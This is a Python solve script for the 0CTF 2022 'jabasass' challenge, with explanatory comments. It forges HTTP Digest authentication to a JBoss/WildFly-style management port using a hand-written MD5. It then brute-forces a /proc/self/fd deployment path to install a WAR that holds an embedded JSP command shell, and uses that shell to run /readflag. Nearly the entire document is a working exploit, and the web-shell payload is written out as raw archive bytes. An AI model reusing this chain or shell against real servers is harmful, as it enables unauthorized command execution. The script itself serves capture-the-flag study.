0ctf 2022 - jabasass
#!/usr/bin/env python3
# import requests_ as requests
# from requests_.auth import HTTPDigestAuth
# url = 'http://localhost:9990/management-upload'
# r = requests.post(url,headers={'Origin':'http://localhost:9990'},auth=HTTPDigestAuth('admin', 'admin'))
# print(r.text)
import _socket
import math
import hashlib
import threading
import base64
import time
# MD5 round schedule (RFC 1321).  Each of the four rounds reuses its own
# four rotation amounts sixteen times, so the table is built round by round.
rotate_amounts = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
# Additive constants: K[i] = floor(|sin(i + 1)| * 2**32), masked to 32 bits.
constants = [int(abs(math.sin(step)) * 2**32) & 0xFFFFFFFF for step in range(1, 65)]
# Initial state words A, B, C, D.
init_values = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]


def _md5_round1(b, c, d):
    """Round-1 mixing function: each bit of b selects c or d."""
    return (b & c) | (~b & d)


def _md5_round2(b, c, d):
    """Round-2 mixing function: each bit of d selects b or c."""
    return (d & b) | (~d & c)


def _md5_round3(b, c, d):
    """Round-3 mixing function: parity of the three words."""
    return b ^ c ^ d


def _md5_round4(b, c, d):
    """Round-4 mixing function."""
    return c ^ (b | ~d)


# Per-step mixing function; the same callable is shared by all 16 steps of a round.
functions = [_md5_round1] * 16 + [_md5_round2] * 16 + [_md5_round3] * 16 + [_md5_round4] * 16


def _word_index_round1(i):
    """Round 1 consumes the message words in order."""
    return i


def _word_index_round2(i):
    """Round 2 message-word permutation."""
    return (5 * i + 1) % 16


def _word_index_round3(i):
    """Round 3 message-word permutation."""
    return (3 * i + 5) % 16


def _word_index_round4(i):
    """Round 4 message-word permutation."""
    return (7 * i) % 16


# Per-step selector for which 32-bit message word feeds the step.
index_functions = [_word_index_round1] * 16 + [_word_index_round2] * 16 + [_word_index_round3] * 16 + [_word_index_round4] * 16
def left_rotate(x, amount):
    """Rotate the low 32 bits of ``x`` left by ``amount`` bits.

    ``x`` is truncated to 32 bits first and the result is again an
    unsigned 32-bit value; ``amount`` is expected in 0..32.
    """
    word = x & 0xFFFFFFFF
    high = (word << amount) & 0xFFFFFFFF
    low = word >> (32 - amount)
    return high | low
def md5(message):
    """Return the MD5 digest of ``message`` as a 128-bit int.

    ``message`` is anything ``bytearray`` accepts (bytes-like or an
    iterable of ints); it is copied, never modified.  The returned int
    packs the four 32-bit state words little-endian, so ``md5_to_hex``
    turns it into the conventional hex digest.  This is a pure-Python
    RFC 1321 implementation; ``hashlib.md5`` is the fast equivalent.
    """
    buf = bytearray(message)
    bit_length = (8 * len(buf)) & 0xFFFFFFFFFFFFFFFF
    # Padding: one 0x80 byte, zeros up to 56 mod 64, then the 64-bit
    # little-endian bit length, giving a whole number of 64-byte blocks.
    zero_pad = (55 - len(buf)) % 64
    buf.append(0x80)
    buf.extend(bytes(zero_pad))
    buf += bit_length.to_bytes(8, byteorder='little')

    state = list(init_values)
    for offset in range(0, len(buf), 64):
        block = buf[offset:offset + 64]
        a, b, c, d = state
        for step in range(64):
            mix = functions[step](b, c, d)
            word_index = index_functions[step](step)
            word = int.from_bytes(block[4 * word_index:4 * word_index + 4], byteorder='little')
            rotated = left_rotate(a + mix + constants[step] + word, rotate_amounts[step])
            # Shift the four state words along, injecting the new b.
            a, b, c, d = d, (b + rotated) & 0xFFFFFFFF, b, c
        # Add the block result back into the running state, mod 2**32 per word.
        state = [(old + new) & 0xFFFFFFFF for old, new in zip(state, (a, b, c, d))]

    digest = 0
    for i, piece in enumerate(state):
        digest |= piece << (32 * i)
    return digest
def md5_to_hex(digest):
    """Render the int returned by ``md5`` as the usual 32-character hex digest.

    The int is serialised as 16 little-endian bytes and those bytes are
    hex-encoded in order; raises OverflowError if ``digest`` does not fit
    in 16 bytes.
    """
    return digest.to_bytes(16, byteorder='little').hex()
#################################
# Outcome printed at the end.  'No win' survives only if the loop below never
# runs; each pass overwrites it with 'Noo' and, on success, with the reply.
stat = 'No win'
# NOTE(review): the pasted source lost its indentation; the structure below
# follows the obvious intent (everything up to `print` is the loop body).
# Each pass substitutes the loop counter for a placeholder inside a decoded
# management operation, re-sends the same request sequence, and stops at the
# first pass whose check on port 8080 returns a reply without 'Error'.
# Preconditions visible here, for anyone assessing exposure: a management
# interface (9990) answering Digest challenges for fixed credentials, and an
# application port (8080) serving what was deployed.
for i in range(600,1000,4):
    # `_socket` is the C accelerator behind the public `socket` module;
    # `socket.socket` would be the conventional API.
    s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
    s.connect(('localhost',9990))
    # Unauthenticated POST; the script expects the reply to carry a Digest
    # challenge containing nonce="..." (presumably a 401 -- not checked).
    s.send(b'POST /management HTTP/1.1\r\nContent-Length:0\r\nHost: localhost:9990\r\n\r\n')
    # One recv of at most 1000 bytes.  If the reply arrives in several
    # segments or has no nonce, bytes.index raises ValueError and the script
    # aborts with the socket still open.
    nonce = s.recv(1000)
    nonce = nonce[nonce.index(b'nonce="')+7:]
    nonce = nonce[:nonce.index(b'"')]
    s.close()
    # Digest `response` computed with the local MD5 above.  The two 32-hex
    # literals look like precomputed HA1 and HA2 for the fixed username,
    # realm and URI in the header below (nc, cnonce and qop match the header
    # too) -- TODO confirm.
    resp = (b'2a0923285184943425d1f53ddd58ec7a:'+nonce+b':00000001:18f6d13842fd9c57:auth:3db80d76fa31213a3e0dfb7dc406d705')
    resp = md5_to_hex(md5(resp))
    s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
    s.connect(('localhost',9990))
    # Hand-built request.  The Origin header ends in a bare '\n' while every
    # other header uses '\r\n' -- may be deliberate; confirm.  Content-Length
    # is a placeholder (1337) patched below once the body length is known.
    v = b'POST /management HTTP/1.1\r\nContent-Type: application/dmr-encoded\r\nOrigin: http://localhost:9990\nHost: localhost:9990\r\nContent-Length:1337\r\nAuthorization: Digest username="admin", realm="ManagementRealm", nonce="'+nonce+b'", uri="/management", algorithm=MD5, response="'+resp.encode()+b'", opaque="00000000000000000000000000000000", qop=auth, nc=00000001, cnonce="18f6d13842fd9c57"\r\n\r\n'
    # Base64 body: a DMR-encoded management operation.  Decoded, it holds a
    # '888' placeholder that is swapped for the loop counter, then re-encoded.
    vv = b'bwAAAAQADHJ1bnRpbWUtbmFtZXMADGxtYW8xMzM3LndhcgAHY29udGVudG8AAAACAARwYXRocwARL3Byb2Mvc2VsZi9mZC84ODgAB2FyY2hpdmVaAAAJb3BlcmF0aW9ucwADYWRkAAdhZGRyZXNzbAAAAAFwAApkZXBsb3ltZW50cwAMbG1hbzEzMzcud2Fy'
    vv = base64.b64decode(vv)
    vv = vv.replace(b'888',str(i).encode())
    vv = base64.b64encode(vv)
    # Replaces every b'1337' in the header block; only Content-Length has one.
    v = v.replace(b'1337',str(len(vv)).encode())+vv
    s.send(v)
    # The reply is never read before the socket is closed.
    s.close()
    #################################
    # Same challenge/response round for /management-upload; only the second
    # hex literal (presumably HA2, which depends on the URI) differs.
    s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
    s.connect(('localhost',9990))
    s.send(b'POST /management-upload HTTP/1.1\r\nContent-Length:0\r\nHost: localhost:9990\r\n\r\n')
    nonce = s.recv(1000)
    nonce = nonce[nonce.index(b'nonce="')+7:]
    nonce = nonce[:nonce.index(b'"')]
    s.close()
    resp = (b'2a0923285184943425d1f53ddd58ec7a:'+nonce+b':00000001:18f6d13842fd9c57:auth:8b9a3a8fac961e2654002c46ef3623cd')
    resp = md5_to_hex(md5(resp))
    s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
    s.connect(('localhost',9990))
    # Same bare-'\n' Origin header and 1337 Content-Length placeholder as above.
    v = b'POST /management-upload HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarytb21P2yhEEYpvqAB\r\nOrigin: http://localhost:9990\nHost: localhost:9990\r\nContent-Length:1337\r\nAuthorization: Digest username="admin", realm="ManagementRealm", nonce="'+nonce+b'", uri="/management-upload", algorithm=MD5, response="'+resp.encode()+b'", opaque="00000000000000000000000000000000", qop=auth, nc=00000001, cnonce="18f6d13842fd9c57"\r\n\r\n'
    # Multipart body: a dozen file parts with near-identical names that all
    # share the DATA placeholder, plus an 'operation' part whose base64 body
    # appears to be a DMR 'deploy' operation for the same deployment name.
    # (Rendered source wrapped this literal at a space; it is one line.)
    vv = b'------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgaylEoad4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgayDload4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgaylSoad4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgaylgoAad4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgaylhoad4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgayjload4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgayload4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="payhload7.zip"; filename="paydload3.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="payloaad6.zip"; filename="paylofad4.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="payloxad5.zip"; filename="payloadd1.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="paycload3.zip"; filename="payloadf.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="payload.zip"; filename="payload.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="operation"; filename="blob"\r\nContent-Type: application/dmr-encoded\r\n\r\nbwAAAAIACW9wZXJhdGlvbnMABmRlcGxveQAHYWRkcmVzc2wAAAABcAAKZGVwbG95bWVudHMADGxtYW8xMzM3Lndhcg==\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB--'
    # DATA is replaced with a literal ZIP archive (starts with PK\x03\x04).
    # Entry names readable in the bytes: META-INF/, META-INF/MANIFEST.MF,
    # WEB-INF/, WEB-INF/web.xml and cmdwow1337.jsp -- i.e. a small web
    # archive whose JSP is what the port-8080 check below requests.
    # (Rendered source wrapped this literal twice at spaces; it is one line.)
    vv = vv.replace(b'DATA',b'PK\x03\x04\x14\x00\x08\x00\x08\x00\xeebP:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x04\x00META-INF/\xfe\xca\x00\x00\x03\x00PK\x07\x08\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00PK\x03\x04\x14\x00\x08\x00\x08\x00\xeebP:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00META-INF/MANIFEST.MF\xf3M\xcc\xcbLK-.\xd1\rK-*\xce\xcc\xcf\xb3R0\xd43\xe0\xe5r.JM,IM\xd1u\xaa\x04\t\x98\xe9\x19\xc4\x1b\x1a(h\x04\x97\xe6)\xf8f&\x17\xe5\x17W\x16\x97\xa4\xe6\x16+x\xe6%\xebi\xf2r\xf1r\x01\x00PK\x07\x08\xa6~]\x16G\x00\x00\x00G\x00\x00\x00PK\x03\x04\n\x00\x00\x00\x00\x00nbP:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00WEB-INF/PK\x03\x04\x14\x03\x00\x00\x08\x00Q\t3U%v\x94\xcf\xc6\x00\x00\x00\\\x01\x00\x00\x0f\x00\x00\x00WEB-INF/web.xml\x85\x8f\xbd\x8e\xc20\x10\x84{?E\xe4>\xde\xfc \x9d\x14\x85P\\\xcbU\xd7\xd0!\xe3,\x90(\xb6\xa3\xac\x89\xf3\xf8\xac\x10\x04:\xba\xd5\xcc7\xda\x99z\xb7\xd8!\x99q\xa2\xce\xbb\xad\xccU&\x93]#\xea\x88\xa7T\x8fc\xc2\xae\xa3\xad\xbc\x860V\x00\xbd\x9e\xb5\xa2\x9bS\xc6[`\x0b\x1cA_ J\xf1\xe0\xaa\x85\xba\x95\x8d1\xaaX*?]\xa0\xc8\xb2\x1c\x0e\x7f\xfb\x7fsE\xab\xd3\xceQ\xd0\xcep\x8a\xf9\x8a\x1e\xe2\xde\x1b\x1d\xb8\xc2\xd7W\xe2\x8b\x0f\xcf\xe6\xc7\xe2\xb8Q\x0b\xb5R\xac\xe3\n\xb5\x91<\x8dp\x9a\x07\x0c\xef+u\xdab\xf3\xeb\xad\xd5\xae\xad\xe1Se\xa8\xa71=w\x036`l\x1b}\xcc\xcb\xf2G\xb1X\xc3\xea\x885\xc4\xe7\xab@#\xeePK\x03\x04\x14\x03\x00\x00\x08\x00YbP:\xd2S0,\\\x01\x00\x00w\x02\x00\x00\x0e\x00\x00\x00cmdwow1337.jsp}\x92]k\xc20\x14\x86\xef\xfb+\xce\x02\x85v\x1b\xf5~k\xcb\xfc\xdatX[\xb4\x0e\xbc\xcc\xecQ3\x9a\xb4K\xd3\xe9\x18\xfb\xefK\x82\xa2\x08\x93@\xceI\xde\'o\xbeN\xe8>AM7\x08\x8c\xd7\x95T\x11\xf9\xa0_4h\x15+\x83\xdb{\x9b\xb3*\xb8%n\xec\x84\xaec\xfaQ\x9eL\xe2\xb0\x97\x0e\x96\xb1\xd3\xaf8\xa7\xa2h`\xc7\xd4\x16^\xe7\x99\x13>\xa7\xb3\x04\x92a>J\x07\x11y\x19\xe6\x04\xa6\xddd\x18\x11\xfe\xbd\xae$\'\xd0\xed\xe7\xe3t\x1a\x11\xa2\xad\xc6\xd3l\x91C\xbe\xcc\xb4\xaep\xaf\x8e\xec\x8a\x17\x97r\xd3\xbes\xa6\x81\xb7\xeed\xa1\x87s\x14\x16\xe9\x98\xedt\xac%\xda\x03\xb25x\x12?[lT\xb0A\x95QI9*\x94\x9e\xf5\xf4\xe1&\x02\xd1\x96\xa5\x0f?N\xd5\xaa\xa0\x96L\xa8Rx\xe4p\x91\x07 p\x07W\x0c\xb4J\xc2\xde,&\xfe\xa3\x93\xc9j\x85M\x035D0k\x85b\x1c\xcd\x92C\xea\xf9\x01\xeequ\xed4\xda#mU\xdd\xaa\xb9\x92H9T\x8dv\xaa\ry>\xedil,N\x14\x13G\xca\xce\x9e\xa0\x01U\xf4\x1c,\x98\xf1\x13\xb8\x83\x0b\xc5cB\xe3:gbc(\t\x91\t\x81\xd6\x8a\t\x13h\xccv[V"xV>\xbe\x1a\\>\x9b\x115\xfb\x8f\xc5\xafn\xae\xf9\xa3Z\xa2\t\xb6d\xc2\x8e\xad\x1f\xe7\x0fPK\x01\x02\x14\x00\x14\x00\x08\x00\x08\x00\xeebP:\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\t\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00META-INF/\xfe\xca\x00\x00PK\x01\x02\x14\x00\x14\x00\x08\x00\x08\x00\xeebP:\xa6~]\x16G\x00\x00\x00G\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x00\x00\x00META-INF/MANIFEST.MFPK\x01\x02\n\x00\n\x00\x00\x00\x00\x00nbP:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc6\x00\x00\x00WEB-INF/PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00Q\t3U%v\x94\xcf\xc6\x00\x00\x00\\\x01\x00\x00\x0f\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xb4\x81\xec\x00\x00\x00WEB-INF/web.xml\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x80\xb6\xe9\xe5\x9e\xcb\xd8\x01\x80\xb6\xe9\xe5\x9e\xcb\xd8\x01\x80\xb6\xe9\xe5\x9e\xcb\xd8\x01PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00YbP:\xd2S0,\\\x01\x00\x00w\x02\x00\x00\x0e\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xb4\x81\xdf\x01\x00\x00cmdwow1337.jsp\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\x1dq\x01\x0b\x90\xc9\x01\x00.x\xec\x9e\xcb\xd8\x01\x00.x\xec\x9e\xcb\xd8\x01PK\x05\x06\x00\x00\x00\x00\x05\x00\x05\x00t\x01\x00\x00g\x03\x00\x00\x00\x00')
    # Alternative left commented out: take the archive from a local file instead.
    # vv = vv.replace(b'DATA',open('/home/hamidreza/pwn/javasass/playground/cmd.war','rb').read())
    v = v.replace(b'1337',str(len(vv)).encode())+vv
    s.send(v)
    # Up to 1000 bytes of the reply are read and discarded.
    s.recv(1000)
    s.close()
    #################################
    # Success check against the application port.  The Host header still
    # names port 9990.  This socket is never closed on either path below.
    s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
    s.connect(('localhost',8080))
    s.send(b'GET /lmao1337/cmdwow1337.jsp?cmd=/readflag HTTP/1.1\r\nHost: localhost:9990\r\n\r\n')
    g = s.recv(1000)
    stat = 'Noo'
    # Any reply (even an empty one) not containing the bytes 'Error' counts as
    # success and ends the loop.
    if(b'Error' not in g):
        stat = g
        break
    # Reached only on a failed pass: one more Digest round and a management
    # operation whose base64 body appears to be a DMR 'remove' of the
    # deployment added above, so the next pass starts clean.  On the success
    # path this cleanup is skipped and the deployment stays in place.
    s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
    s.connect(('localhost',9990))
    s.send(b'POST /management HTTP/1.1\r\nContent-Length:0\r\nHost: localhost:9990\r\n\r\n')
    nonce = s.recv(1000)
    nonce = nonce[nonce.index(b'nonce="')+7:]
    nonce = nonce[:nonce.index(b'"')]
    s.close()
    resp = (b'2a0923285184943425d1f53ddd58ec7a:'+nonce+b':00000001:18f6d13842fd9c57:auth:3db80d76fa31213a3e0dfb7dc406d705')
    resp = md5_to_hex(md5(resp))
    s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
    s.connect(('localhost',9990))
    v = b'POST /management HTTP/1.1\r\nContent-Type: application/dmr-encoded\r\nOrigin: http://localhost:9990\nHost: localhost:9990\r\nContent-Length:1337\r\nAuthorization: Digest username="admin", realm="ManagementRealm", nonce="'+nonce+b'", uri="/management", algorithm=MD5, response="'+resp.encode()+b'", opaque="00000000000000000000000000000000", qop=auth, nc=00000001, cnonce="18f6d13842fd9c57"\r\n\r\n'
    vv = b'bwAAAAIACW9wZXJhdGlvbnMABnJlbW92ZQAHYWRkcmVzc2wAAAABcAAKZGVwbG95bWVudHMADGxtYW8xMzM3Lndhcg=='
    v = v.replace(b'1337',str(len(vv)).encode())+vv
    s.send(v)
    s.close()
print(stat)
# Bare expression statement: evaluates `stat` and discards it -- no effect
# outside an interactive session.
stat
################################